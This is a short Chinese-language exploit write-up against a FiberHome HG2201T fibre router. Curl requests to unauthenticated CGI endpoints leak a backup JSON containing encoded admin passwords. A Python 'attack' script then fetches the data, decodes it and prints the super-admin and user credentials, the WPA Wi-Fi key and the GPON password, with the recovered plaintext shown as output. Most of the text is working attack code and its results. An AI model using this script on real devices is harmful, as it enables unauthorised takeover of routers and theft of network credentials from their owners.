备份信息中可以泄露了超级密码,需要简单解密
curl http://192.168.1.1:8080/cgi-bin/login.htm.cgi # 管理后台
curl http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi # 备份信息
curl http://192.169.1.1:8080/cgi-bin/baseinfo.cgi # 设备信息
返回结果
{
"RETURN": {
"success": true
},
"BASEINFOSET": {
"baseinfoSet_INTERNETMAC": "XX:XX:XX:51:7C:C0",
"baseinfoSet_TR069MAC": "XX:XX:XX:51:7c:c1",
"baseinfoSet_VOIPMAC": "XX:XX:XX:51:7c:c2",
"baseinfoSet_PRIPROTOCOLMAC": "XX:XX:XX:51:7c:c3",
"baseinfoSet_WLANMAC": "XX:XX:XX:51:7c:cd",
"baseinfoSet_PONMAC": "XX:XX:XX:51:7c:cf",
"baseinfoSet_INTERNETEN": "1",
"baseinfoSet_TR069EN": "1",
"baseinfoSet_VOIPEN": "1",
"baseinfoSet_PRIPROTOCOLEN": "1",
"baseinfoSet_PONEN": "",
"baseinfoSet_TELECOMACCOUNT": "telecomadmin",
"baseinfoSet_TELECOMPASSWORD": "120&105&112&105&103&115&113&101&104&113&109&114&49&50&50&54&51&55&49&48&",
"baseinfoSet_USERACCOUNT": "useradmin",
"baseinfoSet_USERPASSWORD": "104&116&111&107&54&56&51&53&54&56&51&53&",
"baseinfoSet_MANUFACTUREROUI": "XXXXXX",
"baseinfoSet_DEVICESERIALNUMBER": "XXXXXX-3C846XXXXXX517CC0",
"baseinfoSet_Compiletime": "23:36:36 Jan 25 2018",
"baseinfoSet_SOFTWAREVERSION": "V1.00.M5002",
"baseinfoSet_EXTNUMBER": "RP000000",
"baseinfoSet_HARDWAREVERSION": "V2.1",
"baseinfoSet_HARDWARECODE": "WKE7.200.400R1A",
"baseinfoSet_SSID": "ChinaNet-Code",
"baseinfoSet_WPAKEY": "JavaIsBest1024Code!",
"baseinfoSet_REGSTATUS": "1",
"baseinfoSet_GPONSN": "FHTT00XXXXXX",
"baseinfoSet_GPONPASSWORD": "HGXXXXXXXX",
"baseinfoSet_PONMODE": "EPON",
"baseinfoSet_BRMAC": "XX:XX:XX:51:7c:cc",
"baseinfoSet_area": "XXXXXX",
"baseinfoSet_IMAGEID": "XXXXXXXXe6ba61dfcfe37c8798850ec",
"baseinfoSet_PreconfigID": "XXXXXXX242ee60b6604d278c52cff70",
"baseinfoSet_factory": "1",
"baseinfoSet_factorymode": "0",
"wirelessenable": "1"
}
}
{
"RETURN": {
"success": true
},
"wirelessenable": "1",
"BASEINFO_PONMODE": "EPON",
"BASEINFO_DeviceType": "HG2201T",
"Portnumber": "4",
"wifi5g": "0",
"wannumber": "10",
"USERNAME": "useradmin",
"BASEINFO_area": "XXXXXX",
"BASEINFO_TYPE": "EPON",
"BASEINFO_ONUMAC": "XX:XX:XX:51:7c:cf",
"BASEINFO_informstatus": "8",
"BASEINFO_BASESTR1": "V1.00.M5002&FiberHome&HG2201T&XXXXXX&3C846XXXXXX517CC0&V2.1&88112325483&1&ChinaNet-Code&JavaIsBest1024Code!&1&WPA/WPA2&Up&NoLink&NoLink&NoLink&ChinaNet-RnqT-2&ChinaNet-RnqT-3&ChinaNet-RnqT-4",
"BASEINFO_SOFTWAREVRESION": "V1.00.M5002",
"BASEINFO_BASESTR5g": "NULL&NULL&NULL&NULL&NULL&NULL&NULL&&",
"BASEINFO_regtime": "104766.77",
"BASEINFO_phyauthstates": "1",
"BASEINFO_loidauthstates": "1",
"BASEINFO_spower": "1.61",
"BASEINFO_rpower": "-21.49",
"BASEINFO_signalstatus": "1",
"BASEINFO_MACAddress": "XX:XX:XX:0f:f6:25;&&&&",
"all_wan_str1": "2&1&PPP&1&2_INTERNET_R_VID_41&1&IP_Routed&Connected&Unconfigured&dev.eth.1,dev.eth.3,dev.eth.4,dev.wla.1&",
"all_wan_str2": "",
"all_wan_str3": "",
"all_wan_str4": "1&1&IP&1&1_TR069_R_VID_46&1&IP_Routed&Connected&Unconfigured&NULL&",
"END": "ENDSTR"
}
写个脚本解密
import requests
import json
def decrypt(ciphertext):
plaintext = ""
for i in ciphertext.split('&'):
if i != "":
c = int(i)
if c > 57: c -= 4
plaintext += chr(int(c))
return plaintext
def attack(host):
try:
req = requests.get("http://{}:8080/cgi-bin/baseinfoSet.cgi".format(host))
back_info = json.loads(req.text)
except Exception as e:
print("request failed!")
return
if back_info["RETURN"]["success"] == True:
base_info_set = back_info["BASEINFOSET"]
print("HOST: {}".format(host))
print("TELECOMACCOUNT: {}".format(base_info_set["baseinfoSet_TELECOMACCOUNT"]))
print("TELECOMPASSWORD: {}".format(decrypt(base_info_set["baseinfoSet_TELECOMPASSWORD"])))
print("USERACCOUNT: {}".format(base_info_set["baseinfoSet_USERACCOUNT"]))
print("USERPASSWORD: {}".format(decrypt(base_info_set["baseinfoSet_USERPASSWORD"])))
print("SSID: {}".format(base_info_set["baseinfoSet_SSID"]))
print("WPAKEY: {}".format(base_info_set["baseinfoSet_WPAKEY"]))
print("GPONSN: {}".format(base_info_set["baseinfoSet_GPONSN"]))
print("GPONPASSWORD: {}".format(base_info_set["baseinfoSet_GPONPASSWORD"]))
if __name__ == "__main__":
attack("192.168.1.1")
输出
HOST: 192.168.1.1
TELECOMACCOUNT: telecomadmin
TELECOMPASSWORD: telecomadmin12263710
USERACCOUNT: useradmin
USERPASSWORD: dpkg68356835
SSID: ChinaNet-Code
WPAKEY: JavaIsBest1024Code!
GPONSN: FHTT00244D02
GPONPASSWORD: HG26012345